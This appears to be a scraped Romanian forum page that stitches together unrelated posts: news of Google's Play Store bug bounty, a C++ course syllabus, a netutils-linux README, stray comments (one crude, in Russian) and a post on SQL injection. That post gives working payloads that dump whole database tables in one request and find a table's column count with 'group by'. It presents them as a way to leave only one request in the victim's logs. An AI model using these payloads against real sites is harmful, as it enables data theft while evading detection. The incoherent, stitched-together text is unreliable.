Leaderboard

Google has finally launched a bug bounty program for Android apps on Google Play Store, inviting security researchers to find and report vulnerabilities in some of the most popular Android apps. Dubbed "Google Play Security Reward," the bug bounty program offers security researchers to work directly with Android app developers to find and fix vulnerabilities in their apps, for which Google will pay $1000 in rewards. "The goal of the program is to further improve app security which will benefit developers, Android users, and the entire Google Play ecosystem," the technology giant says in a blog post published today. Google has collaborated with bug bounty platform, HackerOne, to manage backend for this program, like submitting reports and inviting white-hat hackers and researchers. White-hat hackers who wish to participate can submit their findings directly to the app developers. Once the security vulnerability has been resolved, the hacker needs to submit his/her bug report to HackerOne. Google will then pay out a reward of $1,000 based on its Vulnerability Criteria, wherein, according to the company, more criteria may be added in the future, creating more scope for rewards. "All vulnerabilities must be reported directly to the app developer first. Only submit issues to the Play Security Rewards Program that have already been resolved by the developer." HackerOne said. "For now, the scope of this program is limited to RCE (remote-code-execution) vulnerabilities and corresponding POCs (Proof-of-concepts) that work on Android 4.4 devices and higher." It is an unfortunate truth that even after so many efforts by Google, malicious apps continuously somehow managed to fool its Play Store's security mechanism and infect millions of Android users. It's notable that Google Play Security Reward program does not include finding and reporting fake, adware or malware apps available on Google play store, so the program will not affect the increase in malicious apps on Google's app platform. For now, a limited number of Android apps have been added to Google Play Security Reward Program, including Alibaba, Snapchat, Duolingo, Line, Dropbox, Headspace, Mail.ru and Tinder. So what you are waiting for? Roll up your sleeves and start hunting for vulnerabilities. For more details about Google Play Security Reward Program, visit HackerOne. Sursa: https://thehackernews.com/2017/10/android-bug-bounty.html

Windows

https://wellcode.ro/ - Învață programare de la zero Începe să înveți în ritmul tău Fă-ți un cont gratuit și învață să scrii cod de calitate. Vom fi acolo să te ajutăm când ai nevoie. Content: Introducere C++ IDE Tutorial pentru instalarea CodeBlocks Hello world Evaluarea problemelor Afișare Variabile Tipul de date pentru numere întregi Atribuirea valorilor Citirea de la tastatură a variabilelor Afișarea variabilelor Operatori Adunare Calcul Operatori - II Like If - Structura de decizie Structura instrucțiunii if Condiții compuse FizzBuzz If inlănțuit Else Maxim Else if Crescator 3 Comentarii While - Structura repetitivă I While - Cum funcționează Studiu de caz - Numărul de cifre ale unui număr ABC Studiu de caz - concatenarea a două numere Inversul unui număr Înlănțuirea instrucțiunilor Studiu de caz - Verificarea primalității unui număr Triunghi For - Structura repetitivă II Minimul și maximul a N numere Înmulțire Al x-lea număr prim Șiruri de numere Accesarea și modificarea elementelor unui șir Șiruri de numere - Citire și Afișare Modificare șir Șiruri de numere - Studiu de caz - I Adăugarea unui element în șir Ștergerea unui element din șir Afișarea elementelor pare în ordine inversă Afișare elemente pare și impare Sortarea unui șir de numere Matrice - Tablouri bidimensionale Aplicații în viața reală Citirea și Afișarea Matricilor Studiu de caz - transpusa unei matrice Ștergerea unei linii dintr-o matrice Ștergerea unei coloane dintr-o matrice Matrice patratice Parcurgerea diagonalelor unei matrice pătratice Șiruri de numere - II Şiruri de frecvenţă Căutare binară - Descrierea ideii Căutare binară - implementare Bubble sort Sortare prin numărare https://wellcode.ro/ Sursa: ProTV

https://i.imgur.com/772Ee2O.mp4

A suite of utilities simplilfying linux networking stack performance troubleshooting and tuning. https://pypi.python.org/pypi/netutils-linux netutils-linux It's a useful utils to simplify Linux network troubleshooting and performance tuning, developed in order to help Carbon Reductor techsupport and automate the whole linux performance tuning process out of box (ok, except the best RSS layout detection with multiple network devices). These utils may be useful for datacenters and internet service providers with heavy network workload (you probably wouldn't see an effect at your desktop computer). It's now in production usage with 300+ deployment and save us a lot of time with hardware and software settings debugging. Inspired by packagecloud's blog post. Installation You'll need pip. pip install netutils-linux Utils Monitoring All these top-like utils don't require root priveledges or sudo usage. So you can install and use them as non-priveledged user if you care about security. pip install --user netutils-linux Brief explanation about highlighting colors for CPU and device groups: green and red are for NUMA-nodes, blue and yellow for CPU sockets. Screenshots are taken from different hosts with different hardware. network-top Most useful util in this repo that includes almost all linux network stack performance metrics and allow to monitor interrupts, soft interrupts, network processing statistic for devices and CPUs. Based on following files: /proc/interrupts (vectors with small amount of irqs/second are hidden by default) /proc/net/softnet_stat - packet distribution and errors/squeeze rate between CPUs. /proc/softirqs (only NET_RX and NET_TX values). /sys/class/net/<NET_DEVICE>/statistic/<METRIC> files (you can specify units, mbits are default) There are also separate utils if you want to look at only specific metrics: irqtop, softirq-top, softnet-stat-top, link-rate. snmptop Basic /proc/net/smmp file watcher. Tuning rss-ladder Automatically set smp_affinity_list for IRQ of NIC rx/tx queues that usually work on CPU0 out of the box). Based on lscpu's output. It also supports double/quad ladder in case of multiprocessor systems (but you better explicitly specify queue count == core per socket as NIC's driver's param). Example output: # rss-ladder eth1 0 - distributing interrupts of eth1 (-TxRx-) on socket 0 - eth1: irq 67 eth1-TxRx-0 -> 0 - eth1: irq 68 eth1-TxRx-1 -> 1 - eth1: irq 69 eth1-TxRx-2 -> 2 - eth1: irq 70 eth1-TxRx-3 -> 3 - eth1: irq 71 eth1-TxRx-4 -> 8 - eth1: irq 72 eth1-TxRx-5 -> 9 - eth1: irq 73 eth1-TxRx-6 -> 10 - eth1: irq 74 eth1-TxRx-7 -> 11 autorps Enables RPS on all available CPUs of NUMA node local for the NIC for all NIC's rx queues. It may be good for small servers with cheap network cards. You also can explicitely pass --cpus or --cpu-mask. Example output: # autorps eth0 Using mask 'fc0' for eth0-rx-0. maximize-cpu-freq Sets every CPU scaling governor mode to performance and set max scaling value for min scaling value. So you will be able to use all power of your processor (useful for latency sensible systems). rx-buffers-increase rx-buffers-increase utils, that finds and sets compromise-value between avoiding dropped/missing pkts and keeping a latency low. Example output: # ethtool -g eth1 Ring parameters for eth1: Pre-set maximums: RX: 4096 ... Current hardware settings: RX: 256 # rx-buffers-increase eth1 run: ethtool -G eth1 rx 2048 # rx-buffers-increase eth1 eth1's rx ring buffer already has fine size. # ethtool -g eth1 Ring parameters for eth1: Pre-set maximums: RX: 4096 ... Current hardware settings: RX: 2048 Hardware and its configuration rating server-info Much alike lshw but designed for network processing role of server. # server-info show cpu: info: Architecture: x86_64 BogoMIPS: 6799.9899999999998 Byte Order: Little Endian CPU MHz: 3399.998 CPU family: 6 CPU op-mode(s): 32-bit, 64-bit CPU(s): 2 Core(s) per socket: 1 Hypervisor vendor: KVM L1d cache: 32K L1i cache: 32K L2 cache: 4096K Model: 13 Model name: QEMU Virtual CPU version (cpu64-rhel6) NUMA node(s): 1 NUMA node0 CPU(s): 0,1 On-line CPU(s) list: 0,1 Socket(s): 2 Stepping: 3 Thread(s) per core: 1 Vendor ID: GenuineIntel Virtualization type: full layout: '0': '0' '1': '1' disk: sr0: model: QEMU DVD-ROM vda: model: null size: 64424509440 type: HDD memory: MemFree: 158932 MemTotal: 1922096 SwapFree: 4128764 SwapTotal: 4128764 net: eth1: buffers: cur: 2048 max: 4096 conf: ip: 10.144.63.1/24 vlan: true driver: driver: e1000 version: 7.3.21-k8-NAPI queues: own: [] rx: [] rxtx: [] shared: - virtio1, eth0, eth1 tx: [] unknown: [] It also can rate hardware and its features in range of 1..10. # server-info rate cpu: BogoMIPS: 7 CPU MHz: 7 CPU(s): 1 Core(s) per socket: 1 L3 cache: 1 Socket(s): 10 Thread(s) per core: 10 Vendor ID: 10 disk: sr0: size: 1 type: 2 vda: size: 1 type: 1 memory: MemTotal: 1 SwapTotal: 10 net: eth1: buffers: cur: 5 max: 10 driver: 1 queues: 1 system: Hypervisor vendor: 1 Virtualization type: 1 Download: netutils-linux-master.zip or: git clone https://github.com/strizhechenko/netutils-linux.git Source: https://github.com/strizhechenko/netutils-linux

da, ne este necesar! когда я нажал на ваш профиль, у вас был оргазм

Pentru doritori: https://def.camp/become-a-volunteer/

Backup! Ce exemplu esti tu pentru noi?

De departe, cel mai meserias: http://x.co/ZeusLinux

Avand in vedere ca se apropie, pinned!

Sa iti explic ceva havij cand scoate date dintr-un tabel date foloste o sintaxa de genul select concat(coloana,coloana2,coloana3) from tabel limit X,1 X ala merge de la 0 pana la cate randuri sunt in tabel. De ce sa faci asta cand poti face asta (select @ from(select @:=0x00,(select 0 from tabel where @ in(@:=concat(@,coloana,coloana1,coloana2))))x) Asa le va scoate taote randurile odata iar in logurile victimei in loc sa apara 3000 de requesturi(sau cate randuri sunt) , va aparea decat un singur request. Havij nu se foloseste optim de erorile bazei de date , daca in sursa apare eroarea You Have a error in your sintax, el v-a incerca sa caute numarul de coloane si va incepe sa faca: union select 1 union select 1,2 union select 1,2,3 union select 1,2,3,4 ...... etc. De ce sa faca atata requesturi cand poate face: group by 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100 iar dintr-un sigur request in sursa v-a aparea o eroare de genu Unknow column '34' sa zicem , inseamna ca sunt 33 de coloane.1 request vs 33 de requesturi.

и нахер оно нужно?